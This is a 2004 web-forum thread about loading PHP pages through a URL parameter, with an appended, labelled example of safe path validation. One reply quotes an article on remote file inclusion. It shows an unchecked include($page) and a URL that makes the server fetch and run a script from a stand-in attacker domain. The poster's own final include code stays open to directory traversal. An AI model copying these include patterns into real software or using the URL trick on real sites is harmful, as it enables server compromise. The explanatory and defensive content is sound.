I decided to go with PHP, but what about search results?

Posted: Wed Apr 07, 2004 11:29 pm
by Aleister
I decided that I am going to use a PHP-based solution to handle a large number of files I have. Just something simple, passing a single parameter which is the name of the file I want to import.

So, if on the page that has the links to all these files, which will have:

<a href="http://whatever/file.php?id=test1.php">test1</a>
<a href="http://whatever/file.php?id=test2.php">test2</a> etc...

Will search engines follow these links?

Posted: Thu Apr 08, 2004 12:29 am
by kettle_drum
Google is most likely not to, it will just index the file.php. What you want to have is http://whatever/file.php?id=test1.php/ then just parse the / when you see what page you need to load.

I would also suggest just passing "test1" in the url and have the script force ".php" onto the end of the file name to ensure that only php files will be included - and also make sure the user can only open files in one directory so they can't traverse and include files with sensitive data.

Posted: Thu Apr 08, 2004 10:07 am
by Aleister
I understand the second part.. for security reasons.
The first part though, will that help the search engines? I don't know much about PHP yet so I am not quite sure what you mean. Thanks.

Posted: Thu Apr 08, 2004 10:12 am
by twigletmac
Google will spider dynamically generated links, however, apparently (can't say for sure but I've heard this said a few times) it doesn't like id as the variable in the URL and won't spider links like those you used in your example.

Mac

Posted: Thu Apr 08, 2004 10:28 am
by code_monkey
As a note, I read an article concerning using include files in this way the other day and regarding possible misuse, you should generally include files locally through the file system if possible, see below:
As you may be aware, PHP provides a number of functions for opening files such as 'fopen()' and it's also possible to pass an HTTP or FTP URL to these such that fopen('http://www.somesite.co.uk/'); will fetch the contents of the page for PHP to treat as a file.

What you may not be aware of is that functions such as include() also allow URLs to be passed as their argument. Since these functions cause the included file to be parsed and executed as PHP code, this can be a major security flaw.

Using a PHP file that looks like this:

<html>
...standard header...
<? include($page); ?>
...standard footer...
</html>

as a cheap way to manage common headers and footers. The page would be accessed like so:

http://www.your-domain.co.uk/index.php?page=about.inc

so that a file 'about.inc' is included inside the standard header/footer.

However, unless the $page variable is checked for valid content this is very open to misuse. Malicious third parties could do the following:

http://www.your-domain.co.uk/index.php? ... script.txt

This example would cause http://www.hacker-domain.co.uk/my-root-script.txt to be downloaded and executed as PHP, allowing the hacker to manipulate server files and create backdoors which allow them to log in using telnet or ssh and cause further disruption.

This URL fopen behaviour can be disabled globally by putting the following in php.ini

allow_url_fopen = Off

This configuration change will stop fopen(), include(), and others from opening URLs, and restrict it to local files only.
Hope you find this kind of relevant.

Posted: Thu Apr 08, 2004 12:15 pm
by Aleister
Thanks for the info.. It sounds like this solution will work well for search engines.. I will go ahead and change 'id' to something else.

Now I just need to learn how to secure it better. I liked someone's idea of having the code add on the php extension itself, to make it only open php files.. could the same be done for the directory the files are in? Like, could I do something like this?:

open( "www.mysite.com/dir/" + $filename + ".php" )

That's just a generic example.. not actually php code..

If so, anyone wanna explain really quick how to do that in php? :P As I said I am totally new to it.. I will try to look it up, but if someone wants to be nice and just type it I won't mind lol

Posted: Thu Apr 08, 2004 7:09 pm
by Aleister
I ended up doing this..

<?php     
$page_location = $lyric . ".php";
if($lyric && file_exists($page_location)) {
     include($page_location);
}
else {
     include("empty.php"); /* gives a link back */
     echo "Error!";
}
?>
Any comments? Should it be secure enough?
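
Added example, not part of the original thread: one way to implement the two checks suggested above (the script appends ".php" itself, and the resolved file must stay inside one directory), which also blocks the URL include described earlier regardless of the allow_url_fopen setting. The function name resolve_page(), the temporary page directory and the sample inputs are hypothetical and constructed for the demo.

```php
<?php
// Added example, not code from the thread. resolve_page() and the demo
// directory are hypothetical names chosen for illustration.

/**
 * Map a user-supplied page name to a file inside $baseDir, or return null.
 */
function resolve_page(string $name, string $baseDir): ?string
{
    // Letters, digits, underscore and hyphen only: no dots, slashes,
    // colons or NUL bytes, so "../x" and "http://host/x" fail here.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // The script adds the extension; realpath() resolves symlinks and
    // returns false when the file does not exist.
    $path = realpath($base . DIRECTORY_SEPARATOR . $name . '.php');
    if ($path === false || !is_file($path)) {
        return null;
    }
    // The resolved path must still sit under the base directory.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a throwaway page directory containing one page.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . getmypid();
@mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'test1.php', "test1 content\n");

// Constructed inputs standing in for the request parameter.
$inputs = ['test1', 'missing', '../test1', 'http://example.invalid/x', 'test1.php', ''];
foreach ($inputs as $input) {
    $file = resolve_page($input, $dir);
    $result = $file === null ? 'rejected' : 'include ' . basename($file);
    printf("%-28s => %s\n", var_export($input, true), $result);
}

unlink($dir . DIRECTORY_SEPARATOR . 'test1.php');
rmdir($dir);
```

In a real page the name would be read explicitly from the request (for example `$_GET`) rather than from an auto-registered global, and a null result would fall through to the error page.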